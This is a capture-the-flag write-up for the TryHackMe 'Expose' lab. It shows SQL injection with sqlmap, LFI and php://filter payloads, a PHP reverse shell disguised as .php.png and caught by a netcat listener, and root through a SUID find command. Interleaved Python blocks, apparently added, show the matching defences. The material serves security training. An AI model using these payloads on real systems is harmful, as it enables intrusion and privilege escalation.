TryHackMe Writeup — Expose

rckljuskat
7 min read · Sep 12, 2023


Expose is a subscriber-only room meant to test your red-teaming skills.
Room by 1337rce

Access the room here
Difficulty: Easy
Useful tools for the challenge: Nmap, sqlmap, wordlists, ffuf/gobuster, PHP shells

Enumeration phase

We are going to scan the machine using the industry-standard tool called nmap.

Nmap is used to discover hosts and services on a computer network by sending packets and analyzing the responses. It is built into Kali Linux by default.

We will perform the following two scans:

sudo nmap -T4 -sV MACHINE_IP

Scans the common ports; -sV enables version detection and -T4 speeds up the scan. Read more about the flags here.

sudo nmap -T4 -sV MACHINE_IP -p1000-5000

Scans the non-standard port range 1000-5000.

From here on, the most logical option left to us is to explore the web page and see if it has anything to offer.

It is just a blank page with the title "exposed".

Directory fuzzing

Gobuster is a tool that enumerates hidden directories and files in the target domain by performing a brute-force attack on the URL of the target.

Let’s fuzz using Gobuster to obtain any interesting directories:

Syntax:
gobuster dir -u http://<MACHINE_IP>:<PORT> -w <wordlist> -t <threads>

-t specifies the number of threads (speeds up the process)

After navigating to the /admin page we can see that hitting “Continue” after typing our data does nothing. The page is static and is not of our interest.

The actual admin portal is located at /admin_101 as we can see an error being returned when typing invalid data.

Exploitation phase

First, we should test if the login form is vulnerable to an SQL injection.
You can find some generic SQLi payloads here.
After testing with the payload ‘LIKE’ as username we discover a new page at /admin_101/chat.php.
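To make the login-form test concrete from the developer's side, here is an added comparison (not code from the room or the writeup) of a string-built login query against a parameterised one. The table, the stored credentials, the `login_vulnerable`/`login_safe` names and the classic tautology test string are all constructed here; the room's real schema is not on the page.

```python
"""Login-check comparison: string-built SQL versus a parameterised query.

Added illustration, not code from the Expose room or the writeup. The table,
the credentials and the login_* functions are constructed for this example.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    # In-memory table standing in for the room's admin users table (constructed).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('hacker@root.thm', 'not-the-real-password')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # User input is spliced into the SQL text, so a quote in the input changes
    # the structure of the statement instead of being treated as data.
    sql = ("SELECT 1 FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return conn.execute(sql).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Placeholders keep the statement fixed; the driver passes the values
    # separately, so quotes in the input are compared, never parsed.
    sql = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def demo() -> dict:
    """Run both checks with valid credentials and with a tautology test string."""
    conn = make_db()
    tautology = "' OR '1'='1"   # textbook test string; rewrites the WHERE clause
    return {
        "valid_creds_vulnerable": login_vulnerable(conn, "hacker@root.thm", "not-the-real-password"),
        "valid_creds_safe": login_safe(conn, "hacker@root.thm", "not-the-real-password"),
        "tautology_vulnerable": login_vulnerable(conn, tautology, tautology),
        "tautology_safe": login_safe(conn, tautology, tautology),
    }


if __name__ == "__main__":
    for label, logged_in in demo().items():
        print(f"{label}: {logged_in}")
```

The vulnerable version returns a row for the test string because the WHERE clause becomes `username = '' OR '1'='1' AND password = '' OR '1'='1'`; the parameterised version compares the literal text and finds no such user.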

Checked page source. Found nothing valuable.

Here, we will use a tool called sqlmap to enumerate further and possibly dump the database. To do that we will grab a copy of the login request with Burp Suite and save it to a .txt file.
Burp allows us to intercept traffic and capture the requests sent between our browser and the server.

Capturing request with Burp Proxy and saving it into req.txt

Note that you should disable the Burp proxy before proceeding with the execution of the sqlmap command as it will interfere with the process.

Sqlmap syntax:

sqlmap -r <req_file> --dump

This will dump all data retrieved from the tables of the database

Credentials for hacker@root.thm
Config table

The config table exposes two new pages, along with a password hash for one of them and a hint.

We can crack the hash using crackstation.

After obtaining that information we can log in with the cracked password at /file1010111/index.php and examine the page.

Here we see the following text:

Parameter Fuzzing is also important :) or Can you hide DOM elements?

We open the source of the page and find a hint suggesting we should try “file” or “view” as GET parameters. The page is vulnerable to Local File Inclusion (LFI), which means we can read any file on the server that the web server process is allowed to read.

http://MACHINE_IP:1337/file1010111/index.php?file=/etc/passwd

We just found the username zeamkish (a username starting with Z). We can use that username to log into the upload page we found earlier while dumping the database, at /upload-cv00101011/index.php

The page gives us a way to upload a file onto the server. We should try uploading a PHP reverse shell. However, going one step further and examining the source code of the page, we can see that the upload form accepts only png/jpg files.

<script>
// Client-side check only: it runs in the browser, so the server never enforces it
function validate(){
    var fileInput = document.getElementById('file');
    var file = fileInput.files[0];

    if (file) {
        var fileName = file.name;
        // Only the text after the last dot is inspected
        var fileExtension = fileName.split('.').pop().toLowerCase();

        if (fileExtension === 'jpg' || fileExtension === 'png') {
            // Valid file extension, proceed with file upload
            // You can submit the form or perform further processing here
            console.log('File uploaded successfully');
            return true;
        } else {
            // Invalid file extension, display an error message or take appropriate action
            console.log('Only JPG and PNG files are allowed');
            return false;
        }
    }
}
</script>

We can grab the famous php-reverse-shell script created by PentestMonkey.
Note that you should edit the script with your IP address and listening port.
Save the file with extension .php.png to bypass the filter.
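For contrast with the client-only JavaScript above, here is an added example (not the room's PHP and not from the writeup) of the checks an upload handler should make on the server. The allowed types, the magic numbers, the `check_upload` name and the sample files are constructed for this illustration.

```python
"""Server-side upload checks, added as a contrast to client-only validation.

Illustration only, not the room's PHP: allowed types, magic numbers and the
sample files are constructed. Three rules, each of which stops the .php.png
trick on its own:
  * the name must carry exactly one extension, judged on the whole name, so
    shell.php.png is refused rather than judged by its last part;
  * the leading bytes must match the magic number of the claimed type;
  * the stored name is random, so nothing from the client reaches the disk.
A polyglot (valid PNG header with PHP appended) still passes the byte check,
so the upload directory must additionally never be included or executed.
"""
import os
import secrets
from typing import Tuple

# Constructed allowlist: extension -> magic number expected at offset 0
MAGIC = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff"}


def check_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (True, random_stored_name) or (False, reason)."""
    base = os.path.basename(filename.replace("\\", "/"))   # drop any directory part
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0] or not parts[1]:
        return False, "filename must be name.ext with a single extension"
    ext = parts[1]
    if ext not in MAGIC:
        return False, "extension not allowed"
    if not data.startswith(MAGIC[ext]):
        return False, "file content does not match the extension"
    return True, f"{secrets.token_hex(16)}.{ext}"


def demo() -> dict:
    """Run the check over constructed samples; True = accepted, False = rejected."""
    png_header = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8        # constructed PNG prefix
    php_stub = b"<?php echo 'constructed sample'; ?>"        # constructed non-image content
    return {
        "real_png": check_upload("cv.png", png_header)[0],
        "double_extension": check_upload("shell.php.png", png_header)[0],
        "php_as_png": check_upload("shell.png", php_stub)[0],
        "directory_in_name": check_upload("../cv.png", png_header)[0],
    }


if __name__ == "__main__":
    for label, accepted in demo().items():
        print(f"{label}: {'accepted' if accepted else 'rejected'}")
```

The last sample shows that a directory component in the client-supplied name is simply discarded; because the stored name is random anyway, the client's filename never influences where or under what name the file lands.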

Set up a listener on our machine using Netcat:

Then we upload the file using the form and we receive the following output:

File uploaded successfully! Maybe look in source code to see the path

Remember the LFI we previously exploited? That’s our way into executing the script to get a shell on the server. But we need to know the path in order to access it.

http://MACHINE_IP:1337/file1010111/index.php?file=/path/to/file

We can leak the source code of /upload-cv00101011/index.php using the LFI together with a PHP stream filter. PHP filters transform data as it is read; here convert.base64-encode makes the page return the PHP source as base64 text instead of executing it, which is what happens by default when a .php file is included.

http://MACHINE_IP:1337/file1010111/index.php?file=php://filter/convert.base64-encode/resource=../upload-cv00101011/index.php

We copy the result returned by the page into a text file on our local machine and decode it with:

base64 -d filename.txt

Leaked PHP source code (the decode stops with an error where the base64 text was cut off):

    echo "</p>";
}
else{
    $targetDir = "upload_thm_1001/"; // Directory where uploaded files will be stored
    $targetFile = $targetDir . basename($_FILES["file"]["name"]); // Path of the uploaded file

    // Check if file is a valid upload
    if (move_uploaded_file($_FILES["file"]["tmp_name"], $targetFile)) {
        echo '<h1>File uploaded successfully! Maybe look in source code to see the path<span style=" display: none;">in /upload_thm_1001 folder</span> <h1>';
    } else {
        echo "Error uploading file.";
    }

    exit;
}
}
else{
    if ($password === '********' AND !isset($_SESSION['validate_file'])){
        $_SESSION['validate_file'] = true;

    } else {
        echo '<div class="fixed inset-0 flex items-center justify-center bg-gray-900 bg-opacity-50">';
        echo '<div class="bg-white rounded p-8 max-w-sm mx-auto">';
        echo '<form method="POST"
base64: invalid input

We have just discovered that uploaded files are stored at /upload-cv00101011/upload_thm_1001/
Let’s activate our reverse shell.

http://MACHINE_IP:1337/file1010111/index.php?file=../upload-cv00101011/upload_thm_1001/(put your filename here)

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.10.10] from (UNKNOWN) [10.10.250.78] 52826
Linux ip-10-10-250-78 5.15.0-1039-aws #44~20.04.1-Ubuntu SMP Thu Jun 22 12:21:12 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
12:53:18 up 3:44, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$whoami
www-data
$
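The whole chain works because the `file` parameter is passed straight to an include. As an added example (not the room's PHP and not from the writeup), here is how such a parameter can be resolved so that each request used above is refused; the allowlist, the base directory, the `resolve_include` name and the sample requests are constructed for this illustration.

```python
"""Resolving a page's `file` parameter without arbitrary file inclusion.

Added illustration, not the room's PHP: the allowlist, the base directory and
the request values are constructed. Two independent controls:
  1. an allowlist of page names, so the parameter only selects among known files;
  2. a realpath check as defence in depth, so a value that somehow passes the
     allowlist still cannot leave the base directory or name a stream wrapper.
"""
import os
import tempfile
from typing import Optional

ALLOWED_PAGES = {"index.php", "about.php"}   # constructed allowlist


def resolve_include(param: str, base_dir: str) -> Optional[str]:
    """Return the absolute path to include, or None when the request is refused."""
    if "://" in param or ":" in param.split("/", 1)[0]:
        return None   # php://, data://, file: ... never reach the filesystem at all
    if param not in ALLOWED_PAGES:
        return None   # unknown page name
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, param))
    if os.path.commonpath([base, target]) != base:
        return None   # resolved outside base_dir (symlink or traversal)
    return target if os.path.isfile(target) else None


def demo() -> dict:
    """Exercise the resolver against constructed requests; True = served, False = refused."""
    with tempfile.TemporaryDirectory() as base:
        for name in ALLOWED_PAGES:
            with open(os.path.join(base, name), "w") as fh:
                fh.write("<?php // constructed page ?>\n")
        requests = {
            "about": "about.php",
            "passwd": "/etc/passwd",
            "filter": "php://filter/convert.base64-encode/resource=index.php",
            "traversal": "../upload-cv00101011/upload_thm_1001/shell.php.png",
            "missing": "contact.php",
        }
        return {label: resolve_include(value, base) is not None
                for label, value in requests.items()}


if __name__ == "__main__":
    for label, served in demo().items():
        print(f"{label}: {'served' if served else 'refused'}")
```

The allowlist alone already refuses the traversal, the absolute path and the stream wrapper; the realpath check only matters if the allowlist is later relaxed or a listed file is replaced by a symlink, which is exactly the situation defence in depth exists for.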

Post-Exploitation

Looking around the system we can find zeamkish’s home directory where his ssh creds are stored along with the first flag.

$ cd /home/zeamkish
$ ls
flag.txt
ssh_creds.txt
$ cat ssh_creds.txt

We can establish a more stable connection now using the SSH protocol.

┌──(kali㉿kali)-[~]
└─$ ssh zeamkish@10.10.250.78
zeamkish@10.10.250.78's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.15.0-1039-aws x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Tue Sep 12 13:00:00 UTC 2023

System load: 0.07 Processes: 126
Usage of /: 7.1% of 58.09GB Users logged in: 0
Memory usage: 17% IPv4 address for eth0: 10.10.250.78
Swap usage: 0%


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Sep 12 12:59:52 2023 from 10.18.16.71
zeamkish@ip-10-10-250-78:~$

We can now read the first flag in the same directory.

To further escalate our privileges we will enumerate the machine for any vulnerable SUIDs. The SUID (Set User ID) bit is a permission in Unix-like operating systems that allows a program to run with the permissions of the file’s owner rather than the user who executed it. This means we can elevate our privileges if a binary that’s owned by root is misconfigured.

Search for SUIDs:

$ find / -perm -4000 2>/dev/null

The 2>/dev/null redirection is good practice to keep errors (permission denied messages, mostly) out of the output. It means “send all errors to the mysterious /dev/null”.

The binary /usr/bin/find stands out as a non-standard one in our list.
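Spotting /usr/bin/find by eye works on a small list; on a fleet the same check is done by comparing the SUID files on a host against a known-good baseline. The script below is an added example (not from the writeup) of that comparison; the baseline set, the `find_suid`/`unexpected_suid` names and the sample tree built in `demo()` are constructed, and on a real host the baseline would come from a clean image of the same distribution.

```python
"""Listing set-uid files and comparing them with a baseline, a scripted form of
the `find / -perm -4000` check.

Added illustration, not from the writeup. The baseline set and the sample tree
built in demo() are constructed; a real baseline comes from a clean image.
"""
import os
import stat
import tempfile


def find_suid(root: str) -> set:
    """Paths (relative to root) of regular files with the set-uid bit."""
    found = set()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue   # unreadable entries are skipped, as 2>/dev/null hides them
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.add(os.path.relpath(path, root))
    return found


def unexpected_suid(root: str, baseline: set) -> set:
    """Set-uid files under root that the baseline does not account for."""
    return find_suid(root) - baseline


def demo() -> set:
    """Build a small constructed tree with one extra set-uid binary and audit it."""
    baseline = {"usr/bin/passwd", "usr/bin/sudo"}   # constructed known-good list
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "usr/bin"))
        samples = [("passwd", 0o4755), ("sudo", 0o4755), ("find", 0o4755), ("ls", 0o755)]
        for name, mode in samples:
            path = os.path.join(root, "usr/bin", name)
            with open(path, "w") as fh:
                fh.write("#!/bin/sh\n")   # placeholder content
            os.chmod(path, mode)          # bit is set after writing, so it is not cleared
        return unexpected_suid(root, baseline)


if __name__ == "__main__":
    for path in sorted(demo()):
        print(f"unexpected set-uid file: {path}")
```

Run against `/` with a real baseline the output is the same kind of one-line finding, which is what a host-integrity check should alert on; a set-uid `find` is the only entry the constructed baseline does not explain.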

GTFOBins is an excellent reference when looking at what a misconfigured system binary can be made to do.
The entry for the find binary is here

zeamkish@ip-10-10-250-78:~$ find . -exec /bin/sh -p \; -quit
# whoami
root
# cd /root
# cat root.txt

We finally got a root shell and read the final flag.

Thanks for reading the writeup!

Never forget to feed the penguins :)
